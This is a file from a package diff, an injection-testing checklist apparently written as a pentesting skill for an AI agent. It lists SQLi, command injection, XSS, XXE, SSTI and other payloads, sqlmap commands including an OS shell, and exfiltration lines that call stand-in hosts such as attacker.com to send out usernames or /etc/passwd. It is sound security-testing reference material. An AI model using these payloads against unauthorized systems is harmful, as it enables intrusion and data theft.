@soulofzephir/pi-skill-pentesting 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/LICENSE +21 -0
- package/PUBLISH.md +97 -0
- package/README.md +255 -0
- package/package.json +39 -0
- package/skills/pentesting/SKILL.md +399 -0
- package/skills/pentesting/checklists/headers.md +286 -0
- package/skills/pentesting/checklists/injection.md +456 -0
- package/skills/pentesting/checklists/owasp.md +291 -0
- package/skills/pentesting/checklists/ports.md +323 -0
- package/skills/pentesting/reports/template.md +268 -0
- package/skills/pentesting/tools/generate-report.ps1 +327 -0
- package/skills/pentesting/tools/header-scan.ps1 +202 -0
- package/skills/pentesting/tools/header-scan.sh +173 -0
- package/skills/pentesting/tools/security-scan.ps1 +338 -0
|
@@ -0,0 +1,456 @@
|
|
|
1
|
+
# Injection Testing Checklist
|
|
2
|
+
|
|
3
|
+
## 🚨 Types of Injection
|
|
4
|
+
|
|
5
|
+
| Type | Target | Risk |
|
|
6
|
+
|------|--------|------|
|
|
7
|
+
| SQL Injection | Database | Critical |
|
|
8
|
+
| XSS | Users/Browser | High |
|
|
9
|
+
| Command Injection | OS/Server | Critical |
|
|
10
|
+
| LDAP Injection | Directory | High |
|
|
11
|
+
| XML/XXE | XML Parser | High |
|
|
12
|
+
| XPath Injection | XML Data | Medium |
|
|
13
|
+
| IMAP Injection | Email Server | Medium |
|
|
14
|
+
| ORM Injection | Framework | High |
|
|
15
|
+
| Template Injection | Template Engine | Critical |
|
|
16
|
+
| SSTI | Server Template | Critical |
|
|
17
|
+
|
|
18
|
+
---
|
|
19
|
+
|
|
20
|
+
## 💉 SQL Injection (SQLi)
|
|
21
|
+
|
|
22
|
+
### Types to Test
|
|
23
|
+
- [ ] In-Band SQLi (Union-based)
|
|
24
|
+
- [ ] Blind Boolean-based SQLi
|
|
25
|
+
- [ ] Time-based Blind SQLi
|
|
26
|
+
- [ ] Out-of-Band SQLi
|
|
27
|
+
- [ ] Error-based SQLi
|
|
28
|
+
|
|
29
|
+
### Common Injection Points
|
|
30
|
+
```
|
|
31
|
+
URL parameters: /product?id=1' OR '1'='1
|
|
32
|
+
POST body: username=' OR 1=1--
|
|
33
|
+
Headers: Cookie: id=1'
|
|
34
|
+
Search: q=test' UNION SELECT...
|
|
35
|
+
API params: /api/users?id=1
|
|
36
|
+
File params: avatar=' OR 1=1--
|
|
37
|
+
```
|
|
38
|
+
|
|
39
|
+
### Test Payloads
|
|
40
|
+
|
|
41
|
+
**Basic Detection:**
|
|
42
|
+
```
|
|
43
|
+
'
|
|
44
|
+
"
|
|
45
|
+
`
|
|
46
|
+
)
|
|
47
|
+
))
|
|
48
|
+
OR 1=1
|
|
49
|
+
OR '1'='1
|
|
50
|
+
OR 1=1--
|
|
51
|
+
OR 1=1#
|
|
52
|
+
OR '1'='1'--
|
|
53
|
+
```
|
|
54
|
+
|
|
55
|
+
**Union-Based:**
|
|
56
|
+
```
|
|
57
|
+
' UNION SELECT NULL--
|
|
58
|
+
' UNION SELECT NULL,NULL--
|
|
59
|
+
' UNION SELECT NULL,NULL,NULL--
|
|
60
|
+
' UNION SELECT 1--
|
|
61
|
+
' UNION SELECT 1,2,3--
|
|
62
|
+
' UNION SELECT NULL,NULL FROM dual--
|
|
63
|
+
```
|
|
64
|
+
|
|
65
|
+
**Stacking:**
|
|
66
|
+
```
|
|
67
|
+
'; SELECT SLEEP(5);--
|
|
68
|
+
'; WAITFOR DELAY '0:0:5';--
|
|
69
|
+
```
|
|
70
|
+
|
|
71
|
+
**Blind Boolean:**
|
|
72
|
+
```
|
|
73
|
+
' AND 1=1--
|
|
74
|
+
' AND 1=2--
|
|
75
|
+
' AND 'x'='x
|
|
76
|
+
' AND 'x'='y
|
|
77
|
+
' OR (SELECT COUNT(*) FROM users)>0--
|
|
78
|
+
```
|
|
79
|
+
|
|
80
|
+
**Time-Based:**
|
|
81
|
+
```
|
|
82
|
+
'; IF(1=1) WAITFOR DELAY '0:0:5'--
|
|
83
|
+
'; SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END--
|
|
84
|
+
'; pg_sleep(5)--
|
|
85
|
+
'; BENCHMARK(5000000,MD5('A'))--
|
|
86
|
+
```
|
|
87
|
+
|
|
88
|
+
### Auto Tools
|
|
89
|
+
```bash
|
|
90
|
+
# SQLMap basic
|
|
91
|
+
sqlmap -u "http://target.com/product?id=1" --batch
|
|
92
|
+
|
|
93
|
+
# SQLMap with POST
|
|
94
|
+
sqlmap -u "http://target.com/login" --data="username=admin&password=test"
|
|
95
|
+
|
|
96
|
+
# SQLMap with cookies
|
|
97
|
+
sqlmap -u "http://target.com/profile" --cookie="PHPSESSID=abc123"
|
|
98
|
+
|
|
99
|
+
# SQLMap full enumeration
|
|
100
|
+
sqlmap -u "http://target.com" --batch --level=5 --risk=3 --dbs
|
|
101
|
+
|
|
102
|
+
# SQLMap shell
|
|
103
|
+
sqlmap -u "http://target.com" --batch --os-shell
|
|
104
|
+
```
|
|
105
|
+
|
|
106
|
+
---
|
|
107
|
+
|
|
108
|
+
## 🖥️ Command Injection
|
|
109
|
+
|
|
110
|
+
### Test Payloads
|
|
111
|
+
|
|
112
|
+
**Linux:**
|
|
113
|
+
```bash
|
|
114
|
+
; whoami
|
|
115
|
+
; ls -la /
|
|
116
|
+
; cat /etc/passwd
|
|
117
|
+
; id
|
|
118
|
+
; pwd
|
|
119
|
+
; uname -a
|
|
120
|
+
| whoami
|
|
121
|
+
| cat /etc/passwd
|
|
122
|
+
&& whoami
|
|
123
|
+
`whoami`
|
|
124
|
+
$(whoami)
|
|
125
|
+
${IFS}cat${IFS}/etc/passwd
|
|
126
|
+
|| whoami
|
|
127
|
+
; ping -c 3 127.0.0.1
|
|
128
|
+
```
|
|
129
|
+
|
|
130
|
+
**Windows:**
|
|
131
|
+
```cmd
|
|
132
|
+
; whoami
|
|
133
|
+
; dir c:\
|
|
134
|
+
; type c:\windows\win.ini
|
|
135
|
+
| whoami
|
|
136
|
+
& whoami
|
|
137
|
+
&& whoami
|
|
138
|
+
|| whoami
|
|
139
|
+
`whoami`
|
|
140
|
+
```
|
|
141
|
+
|
|
142
|
+
**Blind Command Injection:**
|
|
143
|
+
```bash
|
|
144
|
+
# Linux - time-based
|
|
145
|
+
; sleep 5
|
|
146
|
+
| sleep 5
|
|
147
|
+
&& sleep 5
|
|
148
|
+
|| sleep 5
|
|
149
|
+
|
|
150
|
+
# Linux - out-of-band
|
|
151
|
+
; nslookup $(whoami).attacker.com
|
|
152
|
+
; curl http://attacker.com/$(whoami)
|
|
153
|
+
|
|
154
|
+
# Windows - time-based
|
|
155
|
+
; ping -n 5 127.0.0.1
|
|
156
|
+
```
|
|
157
|
+
|
|
158
|
+
### Common Injection Points
|
|
159
|
+
```
|
|
160
|
+
Search: ?q=test;ls
|
|
161
|
+
Ping: ?host=127.0.0.1;cat /etc/passwd
|
|
162
|
+
DNS: ?domain=example.com;id
|
|
163
|
+
Email: ?to=test@x.com|id
|
|
164
|
+
File: ?file=report.pdf;whoami
|
|
165
|
+
URL: /redirect?url=http://evil.com
|
|
166
|
+
```
|
|
167
|
+
|
|
168
|
+
### Auto Tools
|
|
169
|
+
```bash
|
|
170
|
+
# Commix
|
|
171
|
+
commix -u "http://target.com/ping?ip=127.0.0.1"
|
|
172
|
+
|
|
173
|
+
# SQLMap command injection mode
|
|
174
|
+
sqlmap -u "http://target.com" --os-cmd="whoami"
|
|
175
|
+
|
|
176
|
+
# Manual
|
|
177
|
+
# Try: 127.0.0.1;ls
|
|
178
|
+
# Try: 127.0.0.1|ls
|
|
179
|
+
# Try: 127.0.0.1&&ls
|
|
180
|
+
# Try: 127.0.0.1`ls`
|
|
181
|
+
# Try: 127.0.0.1$(ls)
|
|
182
|
+
```
|
|
183
|
+
|
|
184
|
+
---
|
|
185
|
+
|
|
186
|
+
## 🐙 XSS (Cross-Site Scripting)
|
|
187
|
+
|
|
188
|
+
### Types
|
|
189
|
+
- [ ] Reflected XSS
|
|
190
|
+
- [ ] Stored/Persistent XSS
|
|
191
|
+
- [ ] DOM-based XSS
|
|
192
|
+
- [ ] Self-XSS
|
|
193
|
+
- [ ] Blind XSS (PolyChain)
|
|
194
|
+
|
|
195
|
+
### Test Payloads
|
|
196
|
+
|
|
197
|
+
**Basic:**
|
|
198
|
+
```html
|
|
199
|
+
<script>alert(1)</script>
|
|
200
|
+
<img src=x onerror=alert(1)>
|
|
201
|
+
<svg onload=alert(1)>
|
|
202
|
+
<body onload=alert(1)>
|
|
203
|
+
<input onfocus=alert(1) autofocus>
|
|
204
|
+
<select onfocus=alert(1) autofocus>
|
|
205
|
+
<iframe src="javascript:alert(1)">
|
|
206
|
+
<video><source onerror="alert(1)">
|
|
207
|
+
<audio src=x onerror=alert(1)>
|
|
208
|
+
<details open ontoggle=alert(1)>
|
|
209
|
+
<marquee onstart=alert(1)>
|
|
210
|
+
```
|
|
211
|
+
|
|
212
|
+
**Event Handlers:**
|
|
213
|
+
```html
|
|
214
|
+
onload, onerror, onclick
|
|
215
|
+
onmouseover, onmouseout
|
|
216
|
+
onfocus, onblur
|
|
217
|
+
onchange, onsubmit
|
|
218
|
+
onkeydown, onkeyup, onkeypress
|
|
219
|
+
ondblclick, ondrag
|
|
220
|
+
```
|
|
221
|
+
|
|
222
|
+
**WAF Bypass:**
|
|
223
|
+
```html
|
|
224
|
+
<SCRIPT>alert(1)</SCRIPT>
|
|
225
|
+
<scrIPT>alert(1)</scrIPT>
|
|
226
|
+
<ScRiPt>alert(1)</sCrIpT>
|
|
227
|
+
<img src="x" onerror="alert(1)">
|
|
228
|
+
<svg><script>alert(1)</script></svg>
|
|
229
|
+
<svg><g/onload=alert(1)>
|
|
230
|
+
<svg><script>eval('alert(1)')</script></svg>
|
|
231
|
+
<iframe src="javascript:alert(1)">
|
|
232
|
+
<img src=x:alert(1)>
|
|
233
|
+
<object data="data:text/html,<script>alert(1)</script>">
|
|
234
|
+
```
|
|
235
|
+
|
|
236
|
+
**Polyglots:**
|
|
237
|
+
```html
|
|
238
|
+
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e
|
|
239
|
+
--></title></textarea></style></script></xmp>><svg/onload=alert(1)//
|
|
240
|
+
'">><marquee><img src=x onerror=alert(1)>
|
|
241
|
+
```
|
|
242
|
+
|
|
243
|
+
**DOM XSS:**
|
|
244
|
+
```javascript
|
|
245
|
+
location.href="javascript:alert(1)"
|
|
246
|
+
document.write("<img src=x onerror=alert(1)>")
|
|
247
|
+
eval("alert(1)")
|
|
248
|
+
setTimeout("alert(1)")
|
|
249
|
+
setInterval("alert(1)")
|
|
250
|
+
innerHTML="<img src=x onerror=alert(1)>"
|
|
251
|
+
```
|
|
252
|
+
|
|
253
|
+
### Common Injection Points
|
|
254
|
+
```
|
|
255
|
+
URL params: /search?q=<script>
|
|
256
|
+
Form input: name=<script>
|
|
257
|
+
Comment: <img src=x onerror=>
|
|
258
|
+
Profile: bio=<svg onload=>
|
|
259
|
+
Chat: message=<script>
|
|
260
|
+
Email: subject=<script>
|
|
261
|
+
```
|
|
262
|
+
|
|
263
|
+
### Auto Tools
|
|
264
|
+
```bash
|
|
265
|
+
# Dalfox (XSS scanner)
|
|
266
|
+
dalfox url "http://target.com/search?q=test"
|
|
267
|
+
|
|
268
|
+
# XSStrike
|
|
269
|
+
xsstrike -u "http://target.com/?q=test"
|
|
270
|
+
|
|
271
|
+
# Nuclei XSS templates
|
|
272
|
+
nmap --script=http-unsafe-output-escaping,http-cross-site-scripting target.com
|
|
273
|
+
|
|
274
|
+
# Manual browser testing required for DOM XSS
|
|
275
|
+
```
|
|
276
|
+
|
|
277
|
+
---
|
|
278
|
+
|
|
279
|
+
## 📁 LDAP Injection
|
|
280
|
+
|
|
281
|
+
### Test Payloads
|
|
282
|
+
```
|
|
283
|
+
*)(objectClass=*
|
|
284
|
+
)(objectClass=*
|
|
285
|
+
*)(objectClass=*
|
|
286
|
+
admin)(&(password=*)
|
|
287
|
+
*)(|
|
|
288
|
+
)(CN=Admin)
|
|
289
|
+
*()
|
|
290
|
+
```
|
|
291
|
+
|
|
292
|
+
### Common Points
|
|
293
|
+
```
|
|
294
|
+
Login: username=admin*)(&
|
|
295
|
+
Search: ?search=admin*
|
|
296
|
+
```
|
|
297
|
+
|
|
298
|
+
---
|
|
299
|
+
|
|
300
|
+
## 📄 XML/XXE Injection
|
|
301
|
+
|
|
302
|
+
### Test Payloads
|
|
303
|
+
|
|
304
|
+
**Basic XXE:**
|
|
305
|
+
```xml
|
|
306
|
+
<?xml version="1.0"?>
|
|
307
|
+
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
|
|
308
|
+
<foo>&xxe;</foo>
|
|
309
|
+
```
|
|
310
|
+
|
|
311
|
+
**Blind XXE:**
|
|
312
|
+
```xml
|
|
313
|
+
<?xml version="1.0"?>
|
|
314
|
+
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">]>
|
|
315
|
+
<foo>&xxe;</foo>
|
|
316
|
+
|
|
317
|
+
<!-- evil.dtd on attacker.com -->
|
|
318
|
+
<!ENTITY xxe SYSTEM "file:///etc/passwd">
|
|
319
|
+
```
|
|
320
|
+
|
|
321
|
+
**Billion Laughs (DoS):**
|
|
322
|
+
```xml
|
|
323
|
+
<!DOCTYPE lolz [
|
|
324
|
+
<!ENTITY lol "lol">
|
|
325
|
+
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
|
|
326
|
+
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
|
|
327
|
+
]>
|
|
328
|
+
<lolz>&lol3;</lolz>
|
|
329
|
+
```
|
|
330
|
+
|
|
331
|
+
### Common Points
|
|
332
|
+
```
|
|
333
|
+
XML API: /api/import
|
|
334
|
+
SOAP API: /soap
|
|
335
|
+
PDF upload
|
|
336
|
+
Office docs upload
|
|
337
|
+
RSS feed
|
|
338
|
+
```
|
|
339
|
+
|
|
340
|
+
---
|
|
341
|
+
|
|
342
|
+
## 🔍 XPath Injection
|
|
343
|
+
|
|
344
|
+
### Test Payloads
|
|
345
|
+
```
|
|
346
|
+
' or '1'='1
|
|
347
|
+
' or ''='
|
|
348
|
+
admin' or '1'='1
|
|
349
|
+
admin' or ''='
|
|
350
|
+
' or count(/*) > 0
|
|
351
|
+
' or count(/child::node()) > 0
|
|
352
|
+
```
|
|
353
|
+
|
|
354
|
+
---
|
|
355
|
+
|
|
356
|
+
## 🗂️ Template Injection (SSTI)
|
|
357
|
+
|
|
358
|
+
### Jinja2 (Python)
|
|
359
|
+
```python
|
|
360
|
+
{{7*7}}
|
|
361
|
+
{{config}}
|
|
362
|
+
{{config.items()}}
|
|
363
|
+
{{''.__class__.__mro__[1].__subclasses__()}}
|
|
364
|
+
{{lipsum.__globals__.__builtins__}}
|
|
365
|
+
{{cycler.__init__.__globals__.os.system('id')}}
|
|
366
|
+
```
|
|
367
|
+
|
|
368
|
+
### Twig (PHP)
|
|
369
|
+
```php
|
|
370
|
+
{{7*7}}
|
|
371
|
+
{{_self.env.setCache("blabla")}}
|
|
372
|
+
{{_self.env.getLoader().getPaths()}}
|
|
373
|
+
{{_self.env.getLoader().getPaths()|escape}}
|
|
374
|
+
```
|
|
375
|
+
|
|
376
|
+
### Handlebars (Node.js)
|
|
377
|
+
```javascript
|
|
378
|
+
{{#with "a"}}{{#with "b"}}{{#with "c"}}{{#with "d"}}{{#with (eval "require('child_process').execSync('id')")}}{{this}}{{/with}}{{/with}}{{/with}}{{/with}}{{/with}}
|
|
379
|
+
```
|
|
380
|
+
|
|
381
|
+
---
|
|
382
|
+
|
|
383
|
+
## 📧 IMAP/SMTP Injection
|
|
384
|
+
|
|
385
|
+
### Test Payloads
|
|
386
|
+
```
|
|
387
|
+
user@domain.com%0ACc:attacker@evil.com
|
|
388
|
+
user@domain.com%0ATo:attacker@evil.com
|
|
389
|
+
user@domain.com%0ASubject:Phishing
|
|
390
|
+
user@domain.com\r\n\r\nPhishing body
|
|
391
|
+
```
|
|
392
|
+
|
|
393
|
+
---
|
|
394
|
+
|
|
395
|
+
## 🛡️ Injection Prevention Checklist
|
|
396
|
+
|
|
397
|
+
- [ ] Input validation (whitelist)
|
|
398
|
+
- [ ] Parameterized queries (prepared statements)
|
|
399
|
+
- [ ] Output encoding/escaping
|
|
400
|
+
- [ ] Content Security Policy
|
|
401
|
+
- [ ] ORM usage (not raw SQL)
|
|
402
|
+
- [ ] No eval() on user input
|
|
403
|
+
- [ ] XML parser secure config
|
|
404
|
+
- [ ] Command execution sandboxed
|
|
405
|
+
- [ ] WAF rules for common payloads
|
|
406
|
+
- [ ] Regular security testing
|
|
407
|
+
|
|
408
|
+
---
|
|
409
|
+
|
|
410
|
+
## ⚡ Quick Test Scripts
|
|
411
|
+
|
|
412
|
+
### SQLi Quick Check
|
|
413
|
+
```bash
|
|
414
|
+
#!/bin/bash
|
|
415
|
+
TARGET=$1
|
|
416
|
+
echo "Testing SQLi on: $TARGET"
|
|
417
|
+
|
|
418
|
+
# Basic test
|
|
419
|
+
PAYLOADS=("'" "' OR '1'='1" "' OR 1=1--" "' UNION SELECT NULL--")
|
|
420
|
+
|
|
421
|
+
for p in "${PAYLOADS[@]}"; do
|
|
422
|
+
RESPONSE=$(curl -s "${TARGET}${p}" | grep -iE "sql|syntax|mysql|postgresql|error|warning|mysql_fetch")
|
|
423
|
+
if [ ! -z "$RESPONSE" ]; then
|
|
424
|
+
echo "⚠️ VULNERABLE with payload: $p"
|
|
425
|
+
echo " Response: $RESPONSE"
|
|
426
|
+
fi
|
|
427
|
+
done
|
|
428
|
+
```
|
|
429
|
+
|
|
430
|
+
### XSS Quick Check
|
|
431
|
+
```bash
|
|
432
|
+
#!/bin/bash
|
|
433
|
+
TARGET=$1
|
|
434
|
+
PAYLOAD="<script>alert('XSS')</script>"
|
|
435
|
+
|
|
436
|
+
echo "Testing XSS on: $TARGET"
|
|
437
|
+
curl -s "${TARGET}${PAYLOAD}" | grep -q "alert" && echo "⚠️ Reflected XSS possible"
|
|
438
|
+
|
|
439
|
+
# Also test with different encoding
|
|
440
|
+
PAYLOAD2="<img src=x onerror=alert(1)>"
|
|
441
|
+
curl -s "${TARGET}${PAYLOAD2}" | grep -q "alert" && echo "⚠️ Event handler XSS"
|
|
442
|
+
```
|
|
443
|
+
|
|
444
|
+
---
|
|
445
|
+
|
|
446
|
+
## 📊 Injection Risk Matrix
|
|
447
|
+
|
|
448
|
+
| Type | Difficulty to Exploit | Impact | Prevalence |
|
|
449
|
+
|------|----------------------|--------|------------|
|
|
450
|
+
| SQLi | Medium | Critical | Common |
|
|
451
|
+
| Command Injection | Easy | Critical | Common |
|
|
452
|
+
| XSS | Easy | High | Very Common |
|
|
453
|
+
| XXE | Medium | High | Common |
|
|
454
|
+
| LDAP Injection | Medium | High | Less Common |
|
|
455
|
+
| SSTI | Medium | Critical | Less Common |
|
|
456
|
+
| XPath | Medium | Medium | Less Common |
|